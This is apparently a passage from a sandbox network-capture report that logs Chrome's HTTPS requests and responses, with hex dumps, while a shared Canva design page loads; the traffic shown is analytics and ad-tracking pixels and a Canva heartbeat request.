                                                                                                                                                                                                                                                                    X-Amz-Cf-Id: znX_pmewA_8CkTo4kg7BjqzF4NGQvupYj6YLDp5cu8YosVyLu_0Npw==
                                                                                                                                                                                                                                                                    Age: 24054
                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                    Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                    2024-11-20 15:01:56 UTC6785INData Raw: 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 2f 2a 2a 0a 20 20 20 2a 20 40 74 79 70 65 20 7b 73 74 72 69 6e 67 7d 20 4b 65 79 20 66 6f 72 20 74 68 65 20 76 69 73 69 74 6f 72 20 49 44 20 63 6f 6f 6b 69 65 2e 0a 20 20 20 2a 2f 0a 20 20 63 6f 6e 73 74 20 76 69 73 69 74 6f 72 49 64 4b 65 79 20 3d 20 22 4d 65 74 61 64 61 74 61 5f 76 69 73 69 74 6f 72 5f 69 64 22 3b 0a 0a 20 20 2f 2a 2a 0a 20 20 20 2a 20 40 74 79 70 65 20 7b 73 74 72 69 6e 67 7d 20 4b 65 79 20 66 6f 72 20 74 68 65 20 73 65 73 73 69 6f 6e 20 49 44 20 63 6f 6f 6b 69 65 2e 0a 20 20 20 2a 2f 0a 20 20 63 6f 6e 73 74 20 73 65 73 73 69 6f 6e 49 64 4b 65 79 20 3d 20 22 4d 65 74 61 64 61 74 61 5f 73 65 73 73 69 6f 6e 5f 69 64 22 3b 0a 0a 20 20 2f 2a 2a 0a 20 20 20 2a 20 40 74 79 70 65 20 7b 73 74
                                                                                                                                                                                                                                                                    Data Ascii: (function () { /** * @type {string} Key for the visitor ID cookie. */ const visitorIdKey = "Metadata_visitor_id"; /** * @type {string} Key for the session ID cookie. */ const sessionIdKey = "Metadata_session_id"; /** * @type {st


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    134192.168.2.124987175.2.57.54443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:56 UTC507OUTGET /i?aid=canva-aad9e5ad-3a29-42d3-a4e3-b2a423a0bfe7&e=pv&p=web&tv=1x1&url=www.canva.com&refr=&uid=undefined&gtmcb=2000780129 HTTP/1.1
                                                                                                                                                                                                                                                                    Host: p.tvpixel.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: sp=0cccb407-2490-4125-ac5b-a35d21badbaa
                                                                                                                                                                                                                                                                    2024-11-20 15:01:56 UTC466INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:56 GMT
                                                                                                                                                                                                                                                                    Content-Type: image/gif
                                                                                                                                                                                                                                                                    Content-Length: 43
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                    Set-Cookie: sp=0cccb407-2490-4125-ac5b-a35d21badbaa; Expires=Thu, 20 Nov 2025 15:01:56 GMT; Domain=tvpixel.com; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                                                                    Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                    Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                    2024-11-20 15:01:56 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 f0 00 00 ff ff ff 00 00 00 21 f9 04 05 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b
                                                                                                                                                                                                                                                                    Data Ascii: GIF89a!,D;


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    135192.168.2.124987018.165.220.106443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:56 UTC795OUTGET /p2?c1=2&c2=34402982&ns_type=hidden&ns_event=page_view&c6=canva-aad9e5ad-3a29-42d3-a4e3-b2a423a0bfe7&c7=&c9=&c8=&gtmcb=2124162551 HTTP/1.1
                                                                                                                                                                                                                                                                    Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: UID=18F9c60199021e57f0570b91732114914; XID=18F9c60199021e57f0570b91732114914
                                                                                                                                                                                                                                                                    2024-11-20 15:01:57 UTC363INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Content-Type: image/gif
                                                                                                                                                                                                                                                                    Content-Length: 43
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:57 GMT
                                                                                                                                                                                                                                                                    Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                                    X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                    Via: 1.1 5008327c23740ce2f9d9ed54c8a489e8.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                    X-Amz-Cf-Pop: BAH53-P1
                                                                                                                                                                                                                                                                    X-Amz-Cf-Id: oB6QzdD8ULggEIk_WNuIVUE2HhPHsWIeefR8RHmuKX7nMw_l_httpA==
                                                                                                                                                                                                                                                                    2024-11-20 15:01:57 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 ff ff ff 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b
                                                                                                                                                                                                                                                                    Data Ascii: GIF89a!,D;


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    136192.168.2.1249873216.239.36.21443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:56 UTC2684OUTGET /g/collect?v=2&tid=G-EPWEMH6717&gtm=45je4bj0v872399471z8812729902za200zb812729902&_p=1732114904608&gcd=13l3l3l3l1l1&npa=0&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081485&cid=1509316245.1732114914&ecid=1113172553&ul=en-us&sr=1280x1024&_fplc=0&ur=US-FL&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&are=1&frm=0&pscdl=noapi&ec_mode=c&sst.tft=1732114904608&sst.ude=0&_s=1&dl=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGXBQfQ3AM%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink%26utm_source%3Deditor&dr=&dt=Canva%20Design&sid=1732114914&sct=1&seg=0&en=Loaded%20a%20Page&_fv=1&_nsi=1&_ss=1&ep.gtm_web_details=GTM-TZPTKRR%20%7C%20290&ep.event_id=1732115097455_173211538951856&ep.custom_dicbo=not%20set&ep.custom_consent_gtm_outbrain=yes&ep.custom_consent_gtm_fpc_rtid=yes&epn.custom_data_newSession2=0&ep.custom_device_category=desktop&ep.custom_event_na [TRUNCATED]
                                                                                                                                                                                                                                                                    Host: ct.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Origin: https://www.canva.com
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000; cf_clearance=f7lju1RE1zdHiOCQL4i18liElZUAlfkVsP6AsyiJ9gk-1732114905-1.2.1.1-6UtwQ4hKGzF5NKxEfI9x5H88_Or4i7.rSV90jNTTLP87mMsuweOxf9DCO7S4n8Mh2iJJF9L5oIl_T_5Dx8gg4KoK9920foRVgkHwJQGftplwcLSoQDZfMfTIca8xp0dpsUJ9zfE0iLU70u4qgItL3UQgK1OsjsDSOLVtMFAUeTxp6tNbNlj_bzERU3hJsxAjxUcowpiF2NDp_.Wng209KNIlFsiCXNpusKjI9AF.xU.W9xNnzKrh.rCkOUQoNawmY4l7lOyfL_.UyhI_tB0ABRq6aO2FugZB72yAs_jk3sc0i8YRldipRimJJbxLPGEmDaFRtMnDyG_EpzNkkYrM.q82jCjLZrLTVnVRW.z5Qb2x6aOIKUUgi.CXD3zqOT20; _ga_EPWEMH6717=GS1.1.1732114914.1.0.1732114914.0.0.1113172553; _ga=GA1.1.1509316245.1732114914
                                                                                                                                                                                                                                                                    2024-11-20 15:01:57 UTC671INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:57 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/plain
                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                    set-cookie: FPID=FPID2.2.I6NLagURRswYtrWhEjcR%2BV1rVDp99CgONTugSsmMaTU%3D.1732114914; Max-Age=63072000; Domain=canva.com; Path=/; Secure; HttpOnly
                                                                                                                                                                                                                                                                    set-cookie: FPLC=jLXJMHlevb5reQIrPNwdeMPDfzTzueskWtJgUbBpXNakAWHeza7ia2V%2BMk8udTZSBkbz%2BKNsnQTsrnm7NmjauXmvy3bXl9vD3UtynZE8Mef9WVvPJwO72FDqFgGDZQ%3D%3D; Max-Age=72000; Domain=canva.com; Path=/; Secure
                                                                                                                                                                                                                                                                    cache-control: no-cache
                                                                                                                                                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                                                                                                                                                    access-control-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                                    access-control-allow-credentials: true
                                                                                                                                                                                                                                                                    Via: 1.1 google
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    2024-11-20 15:01:57 UTC737INData Raw: 33 39 33 0d 0a 65 76 65 6e 74 3a 20 6d 65 73 73 61 67 65 0a 64 61 74 61 3a 20 7b 22 73 65 6e 64 5f 70 69 78 65 6c 22 3a 5b 22 68 74 74 70 73 3a 2f 2f 61 64 2e 64 6f 75 62 6c 65 63 6c 69 63 6b 2e 6e 65 74 2f 61 63 74 69 76 69 74 79 3b 72 65 67 69 73 74 65 72 5f 63 6f 6e 76 65 72 73 69 6f 6e 3d 31 3b 73 72 63 3d 39 38 31 32 33 34 33 3b 74 79 70 65 3d 77 65 62 73 69 30 30 30 3b 63 61 74 3d 66 6c 6f 6f 64 30 3b 6f 72 64 3d 35 35 36 37 39 36 36 33 34 3b 67 74 6d 3d 34 35 6a 39 31 65 34 62 69 31 76 38 37 32 33 39 39 34 37 31 7a 38 38 31 32 37 32 39 39 30 32 7a 39 38 34 38 33 34 31 31 39 38 7a 61 32 30 30 7a 62 38 31 32 37 32 39 39 30 32 3b 64 63 5f 70 72 65 3d 31 3b 75 35 39 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 61 6e 76 61 2e 63 6f 6d 25
                                                                                                                                                                                                                                                                    Data Ascii: 393event: messagedata: {"send_pixel":["https://ad.doubleclick.net/activity;register_conversion=1;src=9812343;type=websi000;cat=flood0;ord=556796634;gtm=45j91e4bi1v872399471z8812729902z9848341198za200zb812729902;dc_pre=1;u59=https%3A%2F%2Fwww.canva.com%
                                                                                                                                                                                                                                                                    2024-11-20 15:01:57 UTC185INData Raw: 73 69 67 6e 25 32 46 64 65 73 69 67 6e 2d 69 64 25 32 46 61 63 63 65 73 73 2d 63 6f 64 65 25 32 46 76 69 65 77 25 33 46 75 74 6d 5f 63 6f 6e 74 65 6e 74 25 33 44 44 41 47 58 42 51 66 51 33 41 4d 25 32 36 75 74 6d 5f 63 61 6d 70 61 69 67 6e 25 33 44 64 65 73 69 67 6e 73 68 61 72 65 25 32 36 75 74 6d 5f 6d 65 64 69 75 6d 25 33 44 6c 69 6e 6b 25 32 36 75 74 6d 5f 73 6f 75 72 63 65 25 33 44 65 64 69 74 6f 72 3f 22 5d 2c 22 6f 70 74 69 6f 6e 73 22 3a 7b 22 61 74 74 72 69 62 75 74 69 6f 6e 5f 72 65 70 6f 72 74 69 6e 67 22 3a 74 72 75 65 7d 7d 0a 0a 0d 0a
                                                                                                                                                                                                                                                                    Data Ascii: sign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGXBQfQ3AM%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink%26utm_source%3Deditor?"],"options":{"attribution_reporting":true}}
                                                                                                                                                                                                                                                                    2024-11-20 15:01:57 UTC872INData Raw: 33 36 31 0d 0a 65 76 65 6e 74 3a 20 6d 65 73 73 61 67 65 0a 64 61 74 61 3a 20 7b 22 73 65 6e 64 5f 70 69 78 65 6c 22 3a 5b 22 68 74 74 70 73 3a 2f 2f 61 64 2e 64 6f 75 62 6c 65 63 6c 69 63 6b 2e 6e 65 74 2f 61 63 74 69 76 69 74 79 3b 73 72 63 3d 39 38 31 32 33 34 33 3b 74 79 70 65 3d 77 65 62 73 69 30 30 30 3b 63 61 74 3d 66 6c 6f 6f 64 30 3b 6f 72 64 3d 35 35 36 37 39 36 36 33 34 3b 67 74 6d 3d 34 35 6a 39 31 65 34 62 69 31 76 38 37 32 33 39 39 34 37 31 7a 38 38 31 32 37 32 39 39 30 32 7a 39 38 34 38 33 34 31 31 39 38 7a 61 32 30 30 7a 62 38 31 32 37 32 39 39 30 32 3b 64 63 5f 70 72 65 3d 31 3b 75 35 39 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 61 6e 76 61 2e 63 6f 6d 25 32 46 64 65 73 69 67 6e 25 32 46 64 65 73 69 67 6e 2d 69 64 25 32
                                                                                                                                                                                                                                                                    Data Ascii: 361event: messagedata: {"send_pixel":["https://ad.doubleclick.net/activity;src=9812343;type=websi000;cat=flood0;ord=556796634;gtm=45j91e4bi1v872399471z8812729902z9848341198za200zb812729902;dc_pre=1;u59=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2
                                                                                                                                                                                                                                                                    2024-11-20 15:02:17 UTC76INData Raw: 34 31 0d 0a 65 76 65 6e 74 3a 20 6d 65 73 73 61 67 65 0a 64 61 74 61 3a 20 7b 22 72 65 73 70 6f 6e 73 65 22 3a 7b 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 32 30 30 2c 22 62 6f 64 79 22 3a 22 22 7d 7d 0a 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                    Data Ascii: 41event: messagedata: {"response":{"status_code":200,"body":""}}0


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    137192.168.2.1249874216.239.36.21443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:56 UTC2660OUTGET /g/collect?v=2&tid=G-EPWEMH6717&gtm=45je4bj0v872399471z8812729902za200zb812729902&_p=1732114904608&gcd=13l3l3l3l1l1&npa=0&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081485&cid=1509316245.1732114914&ecid=1113172553&ul=en-us&sr=1280x1024&_fplc=0&ur=US-FL&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&are=1&frm=0&pscdl=noapi&ec_mode=c&sst.tft=1732114904608&sst.ude=0&_s=2&dl=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGXBQfQ3AM%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink%26utm_source%3Deditor&dr=&dt=Canva%20Design&sid=1732114914&sct=1&seg=0&en=new.user.engagement&ep.gtm_web_details=GTM-TZPTKRR%20%7C%20290&ep.event_id=1732115097455_173211538951881&ep.custom_dicbo=not%20set&ep.custom_consent_gtm_outbrain=yes&ep.custom_consent_gtm_fpc_rtid=yes&epn.custom_data_newSession2=1&ep.custom_device_category=desktop&ep.custom_event_name=new.user.engag [TRUNCATED]
                                                                                                                                                                                                                                                                    Host: ct.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Origin: https://www.canva.com
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000; cf_clearance=f7lju1RE1zdHiOCQL4i18liElZUAlfkVsP6AsyiJ9gk-1732114905-1.2.1.1-6UtwQ4hKGzF5NKxEfI9x5H88_Or4i7.rSV90jNTTLP87mMsuweOxf9DCO7S4n8Mh2iJJF9L5oIl_T_5Dx8gg4KoK9920foRVgkHwJQGftplwcLSoQDZfMfTIca8xp0dpsUJ9zfE0iLU70u4qgItL3UQgK1OsjsDSOLVtMFAUeTxp6tNbNlj_bzERU3hJsxAjxUcowpiF2NDp_.Wng209KNIlFsiCXNpusKjI9AF.xU.W9xNnzKrh.rCkOUQoNawmY4l7lOyfL_.UyhI_tB0ABRq6aO2FugZB72yAs_jk3sc0i8YRldipRimJJbxLPGEmDaFRtMnDyG_EpzNkkYrM.q82jCjLZrLTVnVRW.z5Qb2x6aOIKUUgi.CXD3zqOT20; _ga=GA1.1.1509316245.1732114914; _ga_EPWEMH6717=GS1.1.1732114914.1.0.1732114914.0.0.1113172553
                                                                                                                                                                                                                                                                    2024-11-20 15:01:57 UTC673INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:57 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/plain
                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                    set-cookie: FPID=FPID2.2.I6NLagURRswYtrWhEjcR%2BV1rVDp99CgONTugSsmMaTU%3D.1732114914; Max-Age=63072000; Domain=canva.com; Path=/; Secure; HttpOnly
                                                                                                                                                                                                                                                                    set-cookie: FPLC=yYnxTqm5M9g7tWX5rpJjatUPTNcfdWD6Xmq%2B7VoIu03rCvYhYXbTU%2BVqQTDaLDcqMANWlofzMAL3JETgaK5UDEgRPf%2FUJhcVpP5QGA532pwwgtoBlEbJcN0vJrXs0Q%3D%3D; Max-Age=72000; Domain=canva.com; Path=/; Secure
                                                                                                                                                                                                                                                                    cache-control: no-cache
                                                                                                                                                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                                                                                                                                                    access-control-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                                    access-control-allow-credentials: true
                                                                                                                                                                                                                                                                    Via: 1.1 google
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    2024-11-20 15:01:57 UTC735INData Raw: 32 64 61 0d 0a 65 76 65 6e 74 3a 20 6d 65 73 73 61 67 65 0a 64 61 74 61 3a 20 7b 22 73 65 6e 64 5f 70 69 78 65 6c 22 3a 5b 22 68 74 74 70 73 3a 2f 2f 61 64 2e 64 6f 75 62 6c 65 63 6c 69 63 6b 2e 6e 65 74 2f 61 63 74 69 76 69 74 79 3b 72 65 67 69 73 74 65 72 5f 63 6f 6e 76 65 72 73 69 6f 6e 3d 31 3b 73 72 63 3d 39 38 31 32 33 34 33 3b 74 79 70 65 3d 63 6f 6e 76 65 30 3b 63 61 74 3d 63 61 6e 76 61 30 30 38 3b 6f 72 64 3d 31 31 31 39 34 33 34 32 37 36 3b 67 74 6d 3d 34 35 6a 39 31 65 34 62 69 31 76 38 37 32 33 39 39 34 37 31 7a 38 38 31 32 37 32 39 39 30 32 7a 39 38 34 38 33 34 31 31 39 38 7a 61 32 30 30 7a 62 38 31 32 37 32 39 39 30 32 3b 64 63 5f 70 72 65 3d 31 3b 75 36 3d 55 53 3b 64 6d 61 3d 30 3b 6e 70 61 3d 30 3b 67 63 64 3d 31 33 6c 33 6c 33 6c 33 6c
                                                                                                                                                                                                                                                                    Data Ascii: 2daevent: messagedata: {"send_pixel":["https://ad.doubleclick.net/activity;register_conversion=1;src=9812343;type=conve0;cat=canva008;ord=1119434276;gtm=45j91e4bi1v872399471z8812729902z9848341198za200zb812729902;dc_pre=1;u6=US;dma=0;npa=0;gcd=13l3l3l3l
                                                                                                                                                                                                                                                                    2024-11-20 15:01:57 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                                                                                    2024-11-20 15:01:57 UTC687INData Raw: 32 61 38 0d 0a 65 76 65 6e 74 3a 20 6d 65 73 73 61 67 65 0a 64 61 74 61 3a 20 7b 22 73 65 6e 64 5f 70 69 78 65 6c 22 3a 5b 22 68 74 74 70 73 3a 2f 2f 61 64 2e 64 6f 75 62 6c 65 63 6c 69 63 6b 2e 6e 65 74 2f 61 63 74 69 76 69 74 79 3b 73 72 63 3d 39 38 31 32 33 34 33 3b 74 79 70 65 3d 63 6f 6e 76 65 30 3b 63 61 74 3d 63 61 6e 76 61 30 30 38 3b 6f 72 64 3d 31 31 31 39 34 33 34 32 37 36 3b 67 74 6d 3d 34 35 6a 39 31 65 34 62 69 31 76 38 37 32 33 39 39 34 37 31 7a 38 38 31 32 37 32 39 39 30 32 7a 39 38 34 38 33 34 31 31 39 38 7a 61 32 30 30 7a 62 38 31 32 37 32 39 39 30 32 3b 64 63 5f 70 72 65 3d 31 3b 75 36 3d 55 53 3b 64 6d 61 3d 30 3b 6e 70 61 3d 30 3b 67 63 64 3d 31 33 6c 33 6c 33 6c 33 6c 31 6c 31 3b 75 61 61 3d 78 38 36 3b 75 61 62 3d 36 34 3b 75 61 66
                                                                                                                                                                                                                                                                    Data Ascii: 2a8event: messagedata: {"send_pixel":["https://ad.doubleclick.net/activity;src=9812343;type=conve0;cat=canva008;ord=1119434276;gtm=45j91e4bi1v872399471z8812729902z9848341198za200zb812729902;dc_pre=1;u6=US;dma=0;npa=0;gcd=13l3l3l3l1l1;uaa=x86;uab=64;uaf
                                                                                                                                                                                                                                                                    2024-11-20 15:01:57 UTC1408INData Raw: 35 39 33 0d 0a 65 76 65 6e 74 3a 20 6d 65 73 73 61 67 65 0a 64 61 74 61 3a 20 7b 22 73 65 6e 64 5f 70 69 78 65 6c 22 3a 5b 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 61 64 73 65 72 76 69 63 65 73 2e 63 6f 6d 2f 70 61 67 65 61 64 2f 63 6f 6e 76 65 72 73 69 6f 6e 2f 38 30 34 37 35 37 30 37 39 2f 3f 72 61 6e 64 6f 6d 3d 38 38 34 35 38 30 36 32 31 26 66 73 74 3d 31 37 33 32 31 31 34 39 31 37 32 32 37 26 63 76 3d 31 30 26 66 6d 74 3d 33 26 6c 61 62 65 6c 3d 59 61 78 4b 43 4b 54 4a 6c 59 77 59 45 4e 65 38 33 76 38 43 26 62 67 3d 66 66 66 66 66 66 26 67 75 69 64 3d 4f 4e 26 75 5f 77 3d 31 32 38 30 26 75 5f 68 3d 31 30 32 34 26 67 74 6d 3d 34 35 6a 39 31 65 34 62 69 31 76 38 37 32 33 39 39 34 37 31 7a 38 38 31 32 37 32 39 39 30 32 7a 39 38 34 38 33
                                                                                                                                                                                                                                                                    Data Ascii: 593event: messagedata: {"send_pixel":["https://www.googleadservices.com/pagead/conversion/804757079/?random=884580621&fst=1732114917227&cv=10&fmt=3&label=YaxKCKTJlYwYENe83v8C&bg=ffffff&guid=ON&u_w=1280&u_h=1024&gtm=45j91e4bi1v872399471z8812729902z98483
                                                                                                                                                                                                                                                                    2024-11-20 15:01:57 UTC26INData Raw: 74 69 6f 6e 5f 72 65 70 6f 72 74 69 6e 67 22 3a 74 72 75 65 7d 7d 0a 0a 0d 0a
                                                                                                                                                                                                                                                                    Data Ascii: tion_reporting":true}}
                                                                                                                                                                                                                                                                    2024-11-20 15:01:57 UTC76INData Raw: 34 31 0d 0a 65 76 65 6e 74 3a 20 6d 65 73 73 61 67 65 0a 64 61 74 61 3a 20 7b 22 72 65 73 70 6f 6e 73 65 22 3a 7b 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 32 30 30 2c 22 62 6f 64 79 22 3a 22 22 7d 7d 0a 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                    Data Ascii: 41event: messagedata: {"response":{"status_code":200,"body":""}}0


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    138192.168.2.1249876104.16.102.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:57 UTC1675OUTGET /_ajax/designinsight/heartbeats HTTP/1.1
                                                                                                                                                                                                                                                                    Host: www.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    Accept: */*
